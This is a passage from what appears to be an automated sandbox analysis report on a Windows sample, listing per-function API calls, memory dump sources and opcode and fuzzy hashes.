                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3880355969-0
                                                                                                      • Opcode ID: 236fff3eaeea857cb9976bf36865079379f9537087f5e8b8808fd2db7aa27f81
                                                                                                      • Instruction ID: 8220c84f6fd233a42038b29a5824f6dade6c2c6bf455084f136462eefb89e639
                                                                                                      • Opcode Fuzzy Hash: 236fff3eaeea857cb9976bf36865079379f9537087f5e8b8808fd2db7aa27f81
                                                                                                      • Instruction Fuzzy Hash: 84515C75A00208EFCF15DF64C9809AE7BB6FF46360F188159F8659B2A0D770ED81CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __ioinit.LIBCMT ref: 1000A8C4
                                                                                                        • Part of subcall function 1000AA40: InitOnceExecuteOnce.KERNEL32(100240A4,1000AA7B,00000000,00000000,1001601C,00000109), ref: 1000AA4E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Once$ExecuteInit__ioinit
                                                                                                      • String ID:
                                                                                                      • API String ID: 129814473-0
                                                                                                      • Opcode ID: a0dff12fa8dbd7f5b9632fa84757807e26a808ebf6c1ff8a78c08fc337dec7f4
                                                                                                      • Instruction ID: f05e862a389a0331738e5378cf5e19be36e76e0f16d29e5514cd68968e63fe25
                                                                                                      • Opcode Fuzzy Hash: a0dff12fa8dbd7f5b9632fa84757807e26a808ebf6c1ff8a78c08fc337dec7f4
                                                                                                      • Instruction Fuzzy Hash: CC41E471A00B016EF324CF28C852A6A77E4DF473F0B11871DE8A6872D9E734E8808B11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0fa81b9deaf10826b1822ca5b0530770205cb6a21bfda4ddaff3f480fcc77b68
                                                                                                      • Instruction ID: 04cced882ec0af101294d59f097efa474ae6607dd013329d49b08fd186067c41
                                                                                                      • Opcode Fuzzy Hash: 0fa81b9deaf10826b1822ca5b0530770205cb6a21bfda4ddaff3f480fcc77b68
                                                                                                      • Instruction Fuzzy Hash: 82410871A00308AFDB24AF78CC41B6ABBE8EF98720F10452BF551DB291D771D9518BB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00D860DD
                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00D86103
                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00D86128
                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00D86154
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 3321077145-0
                                                                                                      • Opcode ID: 3feb4a06af0dcc0268d435e56311c81ba434af4627113c5cb55e4f9dddda708c
                                                                                                      • Instruction ID: 5e906766d1a14346c56b9423b950cf0213fd7f432852a81950588a486e126d3a
                                                                                                      • Opcode Fuzzy Hash: 3feb4a06af0dcc0268d435e56311c81ba434af4627113c5cb55e4f9dddda708c
                                                                                                      • Instruction Fuzzy Hash: 6D412D39600610EFCB11EF15C444A5EBBE2EF49720B198488E94AAB362CB35FD41DBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00D37101,00000000,00000000,00D38669,?,00D38669,?,00000001,00D37101,8BE85006,00000001,00D38669,00D38669), ref: 00D4DCB0
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D4DD39
                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D4DD4B
                                                                                                      • __freea.LIBCMT ref: 00D4DD54
                                                                                                        • Part of subcall function 00D43BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D36A99,?,0000015D,?,?,?,?,00D385D0,000000FF,00000000,?,?), ref: 00D43BE2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                      • String ID:
                                                                                                      • API String ID: 2652629310-0
                                                                                                      • Opcode ID: 2113180e0a161109a7c3c17c7f47fe5e59b7676fa94b63c7358f3aa725f8bbcc
                                                                                                      • Instruction ID: 6cd3ffd5dd83c9120f26dabb7eb098436cfe12079b19051cd48bf2eb7f3c8a8f
                                                                                                      • Opcode Fuzzy Hash: 2113180e0a161109a7c3c17c7f47fe5e59b7676fa94b63c7358f3aa725f8bbcc
                                                                                                      • Instruction Fuzzy Hash: 9831DC32A0020AABDF248F64DC85EAE7BA6EF01310F184168FC05D72A0EB35DD54CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00D7B388
                                                                                                      • SetKeyboardState.USER32(00000080), ref: 00D7B3A4
                                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00D7B412
                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00D7B464
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 432972143-0
                                                                                                      • Opcode ID: 4ba76b33621816f91da5a02c8ac38861d00477cf277d91dbe3be660a984e447e
                                                                                                      • Instruction ID: 9f591a46eb9edebd492f03bf90bcc5a606c20bd82b6fc47ec7229f69b1d1e56b
                                                                                                      • Opcode Fuzzy Hash: 4ba76b33621816f91da5a02c8ac38861d00477cf277d91dbe3be660a984e447e
                                                                                                      • Instruction Fuzzy Hash: 32310871A40308AEFF248B65C8057FE7BA5EB45338F48C21BF4D9961D1E375898687B1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00DA5CB1
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA5CD4
                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DA5CE1
                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DA5D07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3340791633-0
                                                                                                      • Opcode ID: 781fe605c07fd9cdcc0c4d6b4acae4f99afb778e21d01329da7d2b47e4cc3699
                                                                                                      • Instruction ID: 849ed15c069674f7199c2a5336e5578061357d51abb27b1ef6abb6c9b1238f6b
                                                                                                      • Opcode Fuzzy Hash: 781fe605c07fd9cdcc0c4d6b4acae4f99afb778e21d01329da7d2b47e4cc3699
                                                                                                      • Instruction Fuzzy Hash: C531C434A51B0CFFEF249F14EC49BE837A6EB06320F5C4102FA52962E9C77599909B71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00D7B4CD
                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00D7B4E9
                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00D7B550
                                                                                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00D7B5A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 432972143-0
                                                                                                      • Opcode ID: d0e4421ee7fbdf8365e2eb02f3aeb583fcc1237853b305188420caa9ff1fdde8
                                                                                                      • Instruction ID: 0456a09b5edf46630b62e5eb9df9ad6c44bd013680a21a972a33cd65dfd50809
                                                                                                      • Opcode Fuzzy Hash: d0e4421ee7fbdf8365e2eb02f3aeb583fcc1237853b305188420caa9ff1fdde8
                                                                                                      • Instruction Fuzzy Hash: AA31E770A40358AEFF248B6888097FE7BB6AF85330F4CC21BE499961D1E374CA458771
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ClientToScreen.USER32(?,?), ref: 00DA7FF9
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00DA806F
                                                                                                      • PtInRect.USER32(?,?,?), ref: 00DA807F
                                                                                                      • MessageBeep.USER32(00000000), ref: 00DA80EB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1352109105-0
                                                                                                      • Opcode ID: 387a70670374f867f0587f104a3c16acbafef7a8389af2dc4824d1fd6c790db7
                                                                                                      • Instruction ID: 6a15f4e02935a5740cc9947fd6b892dbcc238058f684bfe5e17532c7ee4ead62
                                                                                                      • Opcode Fuzzy Hash: 387a70670374f867f0587f104a3c16acbafef7a8389af2dc4824d1fd6c790db7
                                                                                                      • Instruction Fuzzy Hash: 51418830A002149FCB11DF58D884AAAB7F5FB4A310F1980A9E951DB361CB31E949EFB4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetForegroundWindow.USER32 ref: 00DA204A
                                                                                                        • Part of subcall function 00D742CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D742E6
                                                                                                        • Part of subcall function 00D742CC: GetCurrentThreadId.KERNEL32 ref: 00D742ED
                                                                                                        • Part of subcall function 00D742CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D72E43), ref: 00D742F4
                                                                                                      • GetCaretPos.USER32(?), ref: 00DA205E
                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00DA20AB
                                                                                                      • GetForegroundWindow.USER32 ref: 00DA20B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2759813231-0
                                                                                                      • Opcode ID: 6455c945d8eb818b02a9182093d4251e0cd0648269ea33bbbd476de162137c99
                                                                                                      • Instruction ID: 1d555b753241fad11ffe7d381745cd8735137d05a53924667351c277c7e575c2
                                                                                                      • Opcode Fuzzy Hash: 6455c945d8eb818b02a9182093d4251e0cd0648269ea33bbbd476de162137c99
                                                                                                      • Instruction Fuzzy Hash: 79311071E00209AFC704DFAAD8818EEB7F9EF49304B54846AE415E7211DB71DE45CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10013BD9
                                                                                                      • __isleadbyte_l.LIBCMT ref: 10013C07
                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,048B1FE1,00BFBBEF,00000000,?,00000000,?,?,10016650,?,00BFBBEF,00000003), ref: 10013C35
                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,?,?,10016650,?,00BFBBEF,00000003), ref: 10013C6B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                      • String ID:
                                                                                                      • API String ID: 3058430110-0
                                                                                                      • Opcode ID: 834f8e56f46b7e4785997e353a753a5c2034034943f52da4e60fe175993a9fae
                                                                                                      • Instruction ID: 2076e5e6a8273ab8c2982638e68e48dc9fd7ee2638da7151ed1a099b448cc0ad
                                                                                                      • Opcode Fuzzy Hash: 834f8e56f46b7e4785997e353a753a5c2034034943f52da4e60fe175993a9fae
                                                                                                      • Instruction Fuzzy Hash: 6631B031604256EFDB21CF64CC85BAA7BE6FF40290F12C569E9619F1A0E730E890DB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D14154: _wcslen.LIBCMT ref: 00D14159
                                                                                                      • _wcslen.LIBCMT ref: 00D7E7F7
                                                                                                      • _wcslen.LIBCMT ref: 00D7E80E
                                                                                                      • _wcslen.LIBCMT ref: 00D7E839
                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00D7E844
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen$ExtentPoint32Text
                                                                                                      • String ID:
                                                                                                      • API String ID: 3763101759-0
                                                                                                      • Opcode ID: 1ac8e918939031e9c2ac2cb69a8cf582fc1f72d2121e8dddd3470d916d279254
                                                                                                      • Instruction ID: a9c01e22fab6afab3a69754db1fc99d71b10f76b13a0bce698efa546284603b2
                                                                                                      • Opcode Fuzzy Hash: 1ac8e918939031e9c2ac2cb69a8cf582fc1f72d2121e8dddd3470d916d279254
                                                                                                      • Instruction Fuzzy Hash: 92218671D00214BFDB109FA8D981BAEBBF8EF95750F1440A5E908EB241E6749E41CBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00D7DCC1
                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00D7DCCF
                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00D7DCEF
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D7DD9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                      • String ID:
                                                                                                      • API String ID: 420147892-0
                                                                                                      • Opcode ID: 0a1f30dc831e4971d2e31a51f2d2edf256cfb32c9badfbfb9e48869ab102edf4
                                                                                                      • Instruction ID: dac831e10b5868d640bbfc45b05ff5187c7b35883e841eb80cf586bfb0e88356
                                                                                                      • Opcode Fuzzy Hash: 0a1f30dc831e4971d2e31a51f2d2edf256cfb32c9badfbfb9e48869ab102edf4
                                                                                                      • Instruction Fuzzy Hash: 2F318171108300AFC311EF60E885BAFBBF9EF99350F04046DF586861A1EB719985CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D12441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D12452
                                                                                                      • GetCursorPos.USER32(?), ref: 00DA9960
                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DA9975
                                                                                                      • GetCursorPos.USER32(?), ref: 00DA99BD
                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00DA99F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2864067406-0
                                                                                                      • Opcode ID: 899842eb208ce087b0d4f5506d87ac1046c174fdd2383aeaa6f11db759dbed4c
                                                                                                      • Instruction ID: 7bd023b2a43d9b4502ecba6b2ee18d60d63dd90fac8fc189dcc26eb77c0a16ae
                                                                                                      • Opcode Fuzzy Hash: 899842eb208ce087b0d4f5506d87ac1046c174fdd2383aeaa6f11db759dbed4c
                                                                                                      • Instruction Fuzzy Hash: AD219E36500128BFCB158F54DC99EFBBBB9EB0A310F04405AF9058A261D7319D50DF70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNEL32(?,00DADC30), ref: 00D7DABB
                                                                                                      • GetLastError.KERNEL32 ref: 00D7DACA
                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D7DAD9
                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00DADC30), ref: 00D7DB36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2267087916-0
                                                                                                      • Opcode ID: 9f1ff1f425425650c33c7142467b3b099b8160c298bada8ef4b0e7687f1b6d3f
                                                                                                      • Instruction ID: 4df4d416c561fb0ac918647e7773417f6e29d502d807bb3d919caa9da7aca194
                                                                                                      • Opcode Fuzzy Hash: 9f1ff1f425425650c33c7142467b3b099b8160c298bada8ef4b0e7687f1b6d3f
